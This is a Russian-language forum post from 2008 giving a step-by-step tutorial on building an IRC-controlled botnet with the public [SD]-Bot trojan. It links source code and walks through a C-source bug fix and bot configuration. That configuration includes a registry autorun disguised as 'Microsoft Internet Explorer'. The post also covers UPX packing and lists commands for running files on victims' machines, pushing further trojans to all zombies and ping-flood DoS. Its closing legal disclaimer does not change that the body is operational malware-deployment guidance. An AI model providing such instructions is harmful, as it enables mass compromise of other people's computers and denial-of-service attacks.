В этой статье я расскажу о том, как можно завести свой ботнет, покажу обзор самых популярных бот-программ на сегодняшний день, установку и настройку ботов на примере [SD]-Bot. Но, для начала, объясню что такое боты и ботнет. Ботнет - это N-ое количество компьютеров зараженных специальным трояном, который объединяет этот компьютер и остальные зараженные компьютеры в одну единую сеть, которой управляет "хозяин". Бот - это компьютер, на котором установлена бот-программа, при помощи которой "хозяин" может управлять этим компьютером. Боты применяются чаще в хакерских целях, чем в вычислительных. В основном из зараженной машины бот-программа делает "DoS-зомби" которая подчиняется своими хозяину. Ботнетом можно управлять 3 видами: HTTP/IRC/MAIL. На сегодняшний день, самые популярные виды - это HTTP и IRC. В этой статье, я покажу как завести свою бот-сеть, которая будет управляться посредством IRC.

Большинство ботов используют так называемую "stealth" технологию, которая позволяет трояну быть полностью невидимым в системе и юзер даже не будет подозревать что в его системе находиться троян. Некоторые боты-черви используют технологию самораспространения, благодаря нашумевшим дырам в винде, например брешь в службе RPC, боты способны сами распространяться по сети, заражая ежедневно тысячи компьютеров, обычно такие боты пишутся под заказ и стоят много денег. Но не все так плохо как кажется на первый взгляд. Существует множество "public" ботов которые может скачать любой желающий и создать свою бот-сеть. Вот обзор самых популярных паблик-ботов:

AgoBot - Пожалуй самый известный/лучший/с большими возможностями, такими как: DoS/Граббинг паролей/Стелс/Обход фаерволлов и множество других возможностей. К сожалению автор этого бота сейчас сидит в тюрьме, но исходники его творения ушли в сеть, и в данный момент насчитывается около 100(!!) модификация этого бота.

PhatBot - Нашумевшая модификация AgoBot'a с кучей возможностей, отличительная черта: самораспространение через баги в RPC, LSASS и т.п.

Rx-Bot - Достаточно новый бот, не уступающий возможностям AgoBot.

В моем обзоре я возьму другого бота для практики - [SD]-Bot от русского автора [SD].Это пожалуй самый простенький и стабильный бот, обладающий функциями DoS/Администрирование IRC-канала (не уступает возможностям eggdrop). Исходники этого бота, ты найдешь в архиве со статьей (точнее тут: http://inattack.ru/download/art/sdbot05b-AE.zip). Как ты уже понял, бот управляется через IRC, поэтому зарегистрируем канал для наших зомби .Для этого заходим на наш будущий канал и вбиваем туда следующую команду:

/msg chanserv register #канал пароль краткое_описание_канала (например канал Васи Пупкина)

Теперь этот канал принадлежит нам. Теперь о боте. Для компиляции необходим LCC или Visual Studio 6.У меня стоит Visual Studio 7 .NET и все нормально собирается. Не забываем о том, что во многих public-ботах умышленно допущены ошибки для защиты от "детей", поэтому если ты собираешься разводить серьезную бот-сеть, то тебе необходимы знания Си. Итак распаковываем исходники и открываем файл SDBOT05A.CPP.Находим там строчку:

irc_sendf2(sock, "JOIN %s %s\r\n", channel, chanpass)

и меняем ее на:

irc_sendf2(sock, "JOIN %s %s\r\n", channel, chanpass);

Все, ошибка исправлена, теперь перемещаемся на строчку выше и ищем следующую строчку:

// bot configuration
const char botid[] = "set_me"; // ID бота,можно вписывать что угодно, апример "mYz0mb1e"
const char password[] = "set_me"; // Пароль на бота.
const char server[] = "set_me"; // IRC-сервер,пример: "irc.dalnet.ru"
const int port = 6667; // Порт сервера, оставьте как есть.
const char server2[] = ""; // необязательный параметр, на случай если 1 сервер будет не доступен, то бот законнектится на второй
const int port2 = 6667; // Аналогично
const char serverpass[] = ""; // Пароль от сервера(оставьте пустым)
const char channel[] = "set_me"; // Канал ,где будут отчитываться боты, пример: "#ru24"
const char chanpass[] = ""; // Пароль от канала (не обязательный параметр, если ваш канал не требует авторизации)
const char filename[] = "win.exe"; // Название файла-трояна(бот) которое будет видно в процессах.
const BOOL regrun = TRUE; // Использовать ключ в реестре для автозагрузки(включено по умолчанию)
const char valuename[] = "Microsoft Internet Explorer"; // Название ключа в реестре
const char prefix = '.'; // Префикс название у ботов(необязательный параметр)
const char version[] = "sdbot v0.5a by [sd]"; // Метка бота

Остальные параметры нам не интересны. Все, бот готов к эксплуатации. Теперь компилируем это чудо, после этого сжимаем его UPX'ом чтобы уменьшить размер. Теперь заходим на IRC-канал,запускаем у себя трояна и видим что на канал зашел бот Теперь можно давать команды боту (или ботам, если вы уже успели заразить пару компов )

Пример:

<< Nitrex >>: .about
<sdbot1>: sdbot version 0.4c by [sd] (sdbot@mail.ru). homepage: sdbot.n3.net/
<sdbot2>: sdbot version 0.4c by [sd] (sdbot@mail.ru). homepage: sdbot.n3.net/
<sdbot3>: sdbot version 0.4c by [sd] (sdbot@mail.ru). homepage: sdbot.n3.net/

Как видим, все боты послушно выполнили нашу команду - показать инфу о создателе бота. Но тут есть небольшая неувязка: если ты собираешься создать серьезную бот-сеть состоящую из нескольких тысяч компьютеров-зомби, то боты просто зафлудят сообщениями "хозяина". В этом случае ты должен убрать из исходного кода все printf()'ы и sprintf()'ы чтобы мессаги не выводились. Ну а теперь я приведу список самых нужных команд для [SD]-Бота:

cycle <seconds> <channel> - уйти на N-кол-во времени с канала, а потом зайти.
die - самоубийство
execute <visibility> <file> [parameters] - запустить файл на компьютере жертвы
download <url> <destination> <action> - скачать файл на комьютер-зомби. Очень полезно когда нужно затроянить всех зомби другим трояном или модификацией бота!
ping <host> <# of pings> <packet size> <timeout> - великий и ужасный ПИНГ aka DoS

Остальные команды ты найдешь в файле commandref.html. НО ПОМНИ! Все что ты делаешь это противозаконно и попадает под 273 статью УКРФ, данная статья дана лишь для ознакомления и расширения кругозора читателя. Ну и для твоей же безопасности, ведь ты теперь знаешь, что делать если твоя тачка странно себя ведет, ведь так ?

P.S.: Множество реализация различных ботов, ты сможешь найти на сайте wwwsecurityfocus.com.
PSS: http://www.securityforest.com/wiki/inde … ing_Access

Отредактировано masterBlack (2008-06-27 19:27:58)